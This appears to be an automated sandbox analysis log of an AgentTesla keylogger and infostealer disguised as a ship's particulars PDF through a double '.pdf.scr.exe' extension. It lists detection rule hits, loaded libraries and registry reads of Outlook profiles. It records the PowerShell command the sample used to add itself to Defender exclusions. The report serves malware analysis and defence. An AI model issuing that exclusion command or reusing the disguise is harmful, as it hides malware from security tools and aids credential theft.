                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exeBinary or memory string: OriginalFilenameGfhv.exe4 vs MV BBG MUARA Ship's Particulars.pdf.scr.exe
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.3778ee0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.3778ee0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.37b3500.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.37b3500.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 4.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 4.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.37b3500.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.37b3500.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.3778ee0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.3778ee0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/4@2/2
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MV BBG MUARA Ship's Particulars.pdf.scr.exe.logJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2188:120:WilError_03
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_11lz2jrg.ahb.ps1Jump to behavior
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000000.1718710623.0000000000032000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: INSERT INTO [dbo].[CREDIT_PLAN] ([CREDIT_ID], [MATURITY_DATE], [MATURITY_SUM], [MATURITY_NOTE], [MODIF_DATE]) VALUES (@CREDIT_ID, @MATURITY_DATE, @MATURITY_SUM, @MATURITY_NOTE, @MODIF_DATE);
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000000.1718710623.0000000000032000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: INSERT INTO [dbo].[CREDIT_PRODUCT] ([PROD_NAME], [PROD_ACTIVE], [PROD_SUM_FROM], [PROD_SUM_TO], [MODIF_DATE], [INTEREST]) VALUES (@PROD_NAME, @PROD_ACTIVE, @PROD_SUM_FROM, @PROD_SUM_TO, @MODIF_DATE, @INTEREST);
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000000.1718710623.0000000000032000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE [dbo].[Login] SET [User_id] = @User_id, [User_pass] = @User_pass WHERE (([User_id] = @Original_User_id) AND ([User_pass] = @Original_User_pass));
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000000.1718710623.0000000000032000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE [dbo].[CREDIT_PLAN] SET [CREDIT_ID] = @CREDIT_ID, [MATURITY_DATE] = @MATURITY_DATE, [MATURITY_SUM] = @MATURITY_SUM, [MATURITY_NOTE] = @MATURITY_NOTE, [MODIF_DATE] = @MODIF_DATE WHERE (([MATURITY_ID] = @Original_MATURITY_ID) AND ((@IsNull_CREDIT_ID = 1 AND [CREDIT_ID] IS NULL) OR ([CREDIT_ID] = @Original_CREDIT_ID)) AND ([MATURITY_DATE] = @Original_MATURITY_DATE) AND ([MATURITY_SUM] = @Original_MATURITY_SUM) AND ((@IsNull_MATURITY_NOTE = 1 AND [MATURITY_NOTE] IS NULL) OR ([MATURITY_NOTE] = @Original_MATURITY_NOTE)) AND ((@IsNull_MODIF_DATE = 1 AND [MODIF_DATE] IS NULL) OR ([MODIF_DATE] = @Original_MODIF_DATE)));
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000000.1718710623.0000000000032000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: INSERT INTO [dbo].[PROD_PERIODS] ([PROD_CODE], [PROD_PERIOD]) VALUES (@PROD_CODE, @PROD_PERIOD);
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000000.1718710623.0000000000032000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE [dbo].[INTEREST] SET [PROD_CODE] = @PROD_CODE, [PROD_PERIOD] = @PROD_PERIOD, [SUM_FROM] = @SUM_FROM, [SUM_TO] = @SUM_TO WHERE (([PROD_CODE] = @Original_PROD_CODE) AND ([PROD_PERIOD] = @Original_PROD_PERIOD) AND ([SUM_FROM] = @Original_SUM_FROM) AND ([SUM_TO] = @Original_SUM_TO));
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000000.1718710623.0000000000032000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE [dbo].[CREDIT] SET [CREDIT_NO] = @CREDIT_NO, [CREDIT_DATE] = @CREDIT_DATE, [CREDIT_PERIOD] = @CREDIT_PERIOD, [CREDIT_END_DATE] = @CREDIT_END_DATE, [CREDIT_BEGIN_DATE] = @CREDIT_BEGIN_DATE, [CLIENT_ID] = @CLIENT_ID, [PROD_CODE] = @PROD_CODE, [CREDIT_SUM] = @CREDIT_SUM, [CREDIT_NOTE] = @CREDIT_NOTE, [MODIF_DATE] = @MODIF_DATE WHERE (([CREDIT_ID] = @Original_CREDIT_ID) AND ([CREDIT_NO] = @Original_CREDIT_NO) AND ((@IsNull_CREDIT_DATE = 1 AND [CREDIT_DATE] IS NULL) OR ([CREDIT_DATE] = @Original_CREDIT_DATE)) AND ([CREDIT_PERIOD] = @Original_CREDIT_PERIOD) AND ((@IsNull_CREDIT_END_DATE = 1 AND [CREDIT_END_DATE] IS NULL) OR ([CREDIT_END_DATE] = @Original_CREDIT_END_DATE)) AND ((@IsNull_CREDIT_BEGIN_DATE = 1 AND [CREDIT_BEGIN_DATE] IS NULL) OR ([CREDIT_BEGIN_DATE] = @Original_CREDIT_BEGIN_DATE)) AND ([CLIENT_ID] = @Original_CLIENT_ID) AND ((@IsNull_PROD_CODE = 1 AND [PROD_CODE] IS NULL) OR ([PROD_CODE] = @Original_PROD_CODE)) AND ([CREDIT_SUM] = @Original_CREDIT_SUM) AND ((@IsNull_CREDIT_NOTE = 1 AND [CREDIT_NOTE] IS NULL) OR ([CREDIT_NOTE] = @Original_CREDIT_NOTE)) AND ((@IsNull_MODIF_DATE = 1 AND [MODIF_DATE] IS NULL) OR ([MODIF_DATE] = @Original_MODIF_DATE)));
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000000.1718710623.0000000000032000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE [dbo].[CREDIT_PRODUCT] SET [PROD_NAME] = @PROD_NAME, [PROD_ACTIVE] = @PROD_ACTIVE, [PROD_SUM_FROM] = @PROD_SUM_FROM, [PROD_SUM_TO] = @PROD_SUM_TO, [MODIF_DATE] = @MODIF_DATE WHERE (([PROD_CODE] = @Original_PROD_CODE) AND ([PROD_NAME] = @Original_PROD_NAME) AND ([PROD_ACTIVE] = @Original_PROD_ACTIVE) AND ([PROD_SUM_FROM] = @Original_PROD_SUM_FROM) AND ([PROD_SUM_TO] = @Original_PROD_SUM_TO) AND ((@IsNull_MODIF_DATE = 1 AND [MODIF_DATE] IS NULL) OR ([MODIF_DATE] = @Original_MODIF_DATE)));
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000000.1718710623.0000000000032000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: INSERT INTO [dbo].[CREDIT_PRODUCT] ([PROD_NAME], [PROD_ACTIVE], [PROD_SUM_FROM], [PROD_SUM_TO], [MODIF_DATE]) VALUES (@PROD_NAME, @PROD_ACTIVE, @PROD_SUM_FROM, @PROD_SUM_TO, @MODIF_DATE);
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exeReversingLabs: Detection: 47%
                  Source: unknownProcess created: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe "C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe"
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess created: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe "C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe"
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess created: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe "C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeCode function: 0_2_00B5DB84 pushfd ; ret 0_2_00B5DB89
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeCode function: 4_2_051E0C55 push edi; retf 4_2_051E0C7A
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeCode function: 4_2_051EA9E0 push eax; iretd 4_2_051EAA99
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeCode function: 4_2_0690F6F0 push es; ret 4_2_0690F6F4
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exeStatic PE information: section name: .text entropy: 7.528323979837935

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Uses an obfuscated file name to hide its real file extension (double extension)
                  Source: Possible double extension: pdf.scrStatic PE information: MV BBG MUARA Ship's Particulars.pdf.scr.exe
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
